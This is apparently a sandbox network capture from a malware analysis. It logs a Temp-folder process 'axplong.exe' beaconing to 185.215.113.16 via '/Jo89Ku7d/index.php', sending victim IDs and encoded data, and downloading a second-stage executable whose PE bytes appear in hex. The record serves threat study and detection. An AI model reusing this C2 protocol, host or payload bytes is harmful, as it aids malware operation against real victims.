Jul 26, 2024 12:57:04.351777077 CEST	1236	IN	Data Raw: 31 c1 89 ca 44 21 ca 89 c8 44 09 c8 83 f0 ff 0f af c2 89 ca 44 21 c2 44 09 c1 0f af ca 01 c1 89 c8 83 f0 ff 89 ca 83 f2 ff 21 d0 ba 9f e6 ce 44 81 ca 9f e6 ce 44 83 f2 ff 83 f0 ff 41 b8 3c 2b 15 c9 41 81 f0 c3 d4 ea 36 44 31 c2 21 d0 83 f1 ff ba Data Ascii: 1D!DD!D!DDA<+A6D1!_%SAAi9D1!@6"ip1D$TD$T=Q H$HL$XHH$HH8HL$@H@8HD$HHH$HL$HHHL$0
Jul 26, 2024 12:57:04.351788044 CEST	1236	IN	Data Raw: ff 48 83 ec 28 48 89 4c 24 20 48 8b 05 8c a1 28 00 8b 08 e8 1e be 00 00 48 8b 4c 24 20 48 83 c4 28 e9 c7 41 00 00 0f 1f 80 00 00 00 00 48 81 ec a8 00 00 00 48 89 94 24 88 00 00 00 48 89 8c 24 90 00 00 00 48 89 c8 48 83 c0 08 48 89 84 24 98 00 00 Data Ascii: H(HL$ H(HL$ H(AHH$H$HHH$HAH$HH$H$HHL$xHHHH9H$ H$)H$HH$HL$xL$H$H$H@IIIMMIIL
Jul 26, 2024 12:57:04.353586912 CEST	1236	IN	Data Raw: a4 17 7f ae 41 b8 68 85 88 7e 41 81 f0 97 7a 77 81 45 31 c2 41 89 c0 45 21 d0 45 0f af c1 41 89 c1 41 81 e1 38 c9 ec ad 0d 38 c9 ec ad 41 0f af c1 44 01 c0 48 89 11 3d a2 29 b9 50 0f 84 67 ff ff ff e9 00 00 00 00 8b 05 9c ec 26 00 8b 0d 9a ec 26 Data Ascii: Ah~AzwE1AE!EAA88ADH=)Pg&&>p=gO11-/ZzZzA/A/D)))QG!!)=D&D'&Vx7Vx7DAA~5ANF
Jul 26, 2024 12:57:04.353596926 CEST	1236	IN	Data Raw: b3 21 d0 c1 e0 01 29 c8 35 af fd a6 ce 69 c0 97 fb 8b 8d 89 44 24 4c e8 f4 b6 00 00 8b 44 24 4c 3d 3a f4 ca bd 0f 84 0f 02 00 00 e9 0d 00 00 00 48 8b 44 24 68 48 8b 4c 24 50 48 89 08 48 8b 44 24 70 48 89 c1 48 83 c1 38 48 89 4c 24 38 48 8b 40 38 Data Ascii: !)5iD$LD$L=:HD$hHL$PHHD$pHH8HL$8H@8HD$@HHD$hHL$@HHL$(HHHH9HD$0HL$hHD$hHHD$0HT$(LL$8HD$hHL$0H@IIIMMIILHHHHHD$ HH!HEM^

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	60779	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:07.503887892 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 31 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000019001&unit=246122658369
Jul 26, 2024 12:57:08.251503944 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jul 26, 2024 12:57:08.253158092 CEST	70	OUT	GET /inc/build_2024-07-25_20-56.exe HTTP/1.1 Host: 185.215.113.16
Jul 26, 2024 12:57:08.494115114 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:08 GMT Content-Type: application/octet-stream Content-Length: 356864 Last-Modified: Fri, 26 Jul 2024 09:18:51 GMT Connection: keep-alive ETag: "66a369fb-57200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4b 95 bc 4b 0f f4 d2 18 0f f4 d2 18 0f f4 d2 18 60 82 79 18 17 f4 d2 18 60 82 4c 18 1f f4 d2 18 60 82 78 18 50 f4 d2 18 06 8c 41 18 06 f4 d2 18 0f f4 d3 18 7c f4 d2 18 60 82 7d 18 0e f4 d2 18 60 82 48 18 0e f4 d2 18 60 82 4f 18 0e f4 d2 18 52 69 63 68 0f f4 d2 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d5 49 3e 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 a2 03 00 00 8c 03 02 00 00 00 00 bc 1f 00 00 00 10 00 00 00 c0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 07 02 00 04 00 00 2d d0 05 00 02 00 00 81 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$KK`y`L`xPA\|`}`H`ORichPELI>e@-dp@.text `.rdata12@@.datal@.rsrc@@
Jul 26, 2024 12:57:08.494312048 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 8b f1 c7 06 64 e2 43 00 e8 ed 05 00 00 f6 44 24 08 01 74 07 56 e8 73 0b 00 00 Data Ascii: VdCD$tVsY^4U(DeEDV3W{EEuDE?EDEE EEEM=uE@.=u%TEEEEE
Jul 26, 2024 12:57:08.494333982 CEST	328	IN	Data Raw: 00 00 56 33 f6 81 3d cc e8 45 02 00 04 00 00 57 75 44 56 56 56 56 ff 15 90 c0 43 00 56 56 56 56 56 56 56 56 56 56 ff 15 a0 c1 43 00 56 e8 5e 01 00 00 56 56 e8 8d 02 00 00 56 e8 a5 08 00 00 56 56 e8 e9 06 00 00 56 e8 2e 09 00 00 56 56 e8 77 01 00 Data Ascii: V3=EWuDVVVVCVVVVVVVVVVCV^VVVVVV.VVw$3*m}VEPVVVCVdCTCVC.G\|<DE=EuVP0COu_3^Au(CU}Wt-Vu3p
Jul 26, 2024 12:57:08.494359970 CEST	1236	IN	Data Raw: 20 c2 43 00 c6 46 08 00 ff 30 e8 82 ff ff ff 8b c6 5e 5d c2 04 00 c7 01 20 c2 43 00 e9 b0 ff ff ff 8b ff 55 8b ec 56 8b f1 c7 06 20 c2 43 00 e8 9d ff ff ff f6 45 08 01 74 07 56 e8 69 05 00 00 59 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 83 7d 08 00 74 Data Ascii: CF0^] CUV CEtViY^]U}t-uj5,DCuV:TCPY^]jh0C3}3u;;ulV'Y}F@uoVYtt@E
Jul 26, 2024 12:57:08.494378090 CEST	1236	IN	Data Raw: c4 0c e8 cd 06 00 00 c7 00 22 00 00 00 e9 8f fe ff ff 83 4e 0c 20 8b c7 2b c3 33 d2 f7 75 10 e9 84 fe ff ff 83 4e 0c 10 eb ec 6a 0c 68 50 e4 43 00 e8 31 0e 00 00 33 f6 89 75 e4 39 75 10 74 2f 39 75 14 74 2a 39 75 18 75 2d 83 7d 0c ff 74 0f ff 75 Data Ascii: "N +3uNjhPC13u9ut/9ut*9uu-}tuVuKp36uYuuuuuuEEEuYUuuujuZ]U]\|"tj~"Y
Jul 26, 2024 12:57:08.494415045 CEST	1236	IN	Data Raw: 00 00 59 59 c3 8b 65 e8 8b 45 dc 89 45 e0 83 7d e4 00 75 06 50 e8 cc 1d 00 00 e8 ec 1d 00 00 c7 45 fc fe ff ff ff 8b 45 e0 e8 aa 09 00 00 c3 e8 e6 2e 00 00 e9 89 fe ff ff 8b ff 55 8b ec 8b 55 08 56 57 85 d2 74 07 8b 7d 0c 85 ff 75 13 e8 ad 01 00 Data Ascii: YYeEE}uPEE.UUVWt}uj^03Eu+@tOuuwj"Y3_^]US]woVW=,Du#jD"hYYt3@Pj5,DCu&j^9Dt
Jul 26, 2024 12:57:08.494443893 CEST	1236	IN	Data Raw: 8d 48 01 89 0e 8b 4e 18 2b f8 49 89 4e 04 3b fb 7e 1d 57 50 ff 75 0c e8 23 38 00 00 83 c4 0c 89 45 fc eb 4d 83 c8 20 89 46 0c 83 c8 ff eb 79 8b 4d 0c 83 f9 ff 74 1b 83 f9 fe 74 16 8b c1 83 e0 1f 8b d1 c1 fa 05 c1 e0 06 03 04 95 40 f7 45 02 eb 05 Data Ascii: HN+IN;~WPu#8EM FyMtt@ED@ tjSSQ/#t%FM3GWEPu7E9}tN E%_[^ULVEPCj@j ^V*YY3;u@E54E;s6
Jul 26, 2024 12:57:08.494473934 CEST	656	IN	Data Raw: 6c 24 10 2b e0 53 56 57 a1 78 06 44 00 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec Data Ascii: l$+SVWxD1E3PeuEEEEdMdY__^[]QUS]Vs35xDWEE{tN38b4NF38R4E@fMUS[EMt_I[LDEEt5Ex@GEu}t$
Jul 26, 2024 12:57:08.494782925 CEST	1236	IN	Data Raw: 03 89 46 04 6a 01 50 50 53 e8 e6 28 00 00 83 c4 10 8b f8 89 bd ec ef ff ff 89 95 f0 ef ff ff 85 d2 7f 10 7c 04 85 ff 73 0a 83 c8 ff 0b d0 e9 d4 02 00 00 8b c3 c1 f8 05 8d 04 85 40 f7 45 02 83 e3 1f 89 85 e4 ef ff ff 8b 00 c1 e3 06 03 c3 8a 48 24 Data Ascii: FjPPS(\|s@EH$FuF+V+~[39P09Vu<Rp,p((;t(3
Jul 26, 2024 12:57:08.494803905 CEST	1236	IN	Data Raw: 24 0f 8f 3d 01 00 00 85 c0 75 2a 80 fb 30 74 09 c7 45 14 0a 00 00 00 eb 36 8a 07 3c 78 74 0d 3c 58 74 09 c7 45 14 08 00 00 00 eb 23 c7 45 14 10 00 00 00 eb 0a 83 f8 10 75 15 80 fb 30 75 10 8a 07 3c 78 74 04 3c 58 75 06 8a 5f 01 83 c7 02 83 c8 ff Data Ascii: $=u*0tE6<xt<XtE#Eu0u<xt<Xu_3uUNt0t0Kw ;MsM9Er(u;Mv!M}u#EOu }t}e[UUUGuu=t}w
Jul 26, 2024 12:57:08.494827986 CEST	1236	IN	Data Raw: 74 0a 80 3b 0a 75 05 80 08 04 eb 03 80 20 fb 8b 5d f0 8b 45 f4 03 c3 89 5d 10 89 45 f4 3b d8 0f 83 d1 00 00 00 8b 4d 10 8a 01 3c 1a 0f 84 af 00 00 00 3c 0d 74 0c 88 03 43 41 89 4d 10 e9 91 00 00 00 8b 45 f4 48 3b c8 73 18 8d 41 01 80 38 0a 75 0b Data Ascii: t;u ]E]E;M<<tCAMEH;sA8uMuEmEjEPjEP4CuTCuE}t?DHt}tML%;]u}tjjju}tCE9EFD@u

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	60780	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:10.043934107 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 32 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000020001&unit=246122658369
Jul 26, 2024 12:57:10.822861910 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	60782	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:10.934895992 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:11.696167946 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:11.755965948 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:12.053376913 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:12.398148060 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	60784	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:12.513112068 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:13.292661905 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:13.293930054 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:13.572582960 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	60786	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:13.684966087 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:14.506886005 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:14.509496927 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:14.805335045 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	60788	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:14.919533014 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:15.944617033 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:15.945383072 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:15.947890997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:16.203684092 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	60790	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:16.345596075 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:17.191545010 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:17.192511082 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:17.439393997 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	60792	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:17.569570065 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:18.675945997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:18.676935911 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:18.698018074 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:18.953749895 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	60794	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:19.075508118 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:19.826112986 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
